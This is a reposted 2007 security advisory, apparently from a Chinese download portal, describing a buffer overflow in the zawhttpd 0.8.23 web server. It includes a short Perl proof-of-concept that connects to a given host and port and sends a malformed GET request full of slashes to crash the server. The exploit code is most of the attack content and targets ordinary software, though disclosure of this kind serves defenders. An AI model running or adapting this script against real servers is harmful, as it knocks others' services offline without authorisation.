 |
|
 |
您现在的位置: 精品下载 >> 安全 >> 网络安全 >> 安全中心正文 |  用户登录  新用户注册 |
|
||||
| zawhttpd Buffer Overflow | ||||
| 作者:佚名 安全中心来源:不详 点击数: 更新时间:2007-10-10 | ||||
"zawhttpd is a small http server." Improper handling of HTTP headers allows attackers to cause a buffer overflow and execute arbitrary code or crash zawhttpd. Credit: The information has been provided by Kamil 'K3' Sienicki. Details Vulnerable Systems: * zawhttpd version 0.8.23 Exploit: #!/usr/bin/perl # zawhttpd Buffer Overflow Exploit # by Kamil 'K3' Sienicki use IO::Socket; use strict; my($socket) = ""; if($socket = IO::Socket::INET->new( PeerAddr => $ARGV[0], PeerPort => $ARGV[1], Proto => "TCP")) { print "Attempting to kill zawhttpd at $ARGV[0]:$ARGV[1] ..."; print $socket "GET //////////////////// HTTP/1.0/r/n/r/n"; close($socket); } else { print "perl zawhttpd.pl localhost 80 /n"; print "Cannot connect to $ARGV[0]:$ARGV[1]/n"; } #EoF |
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)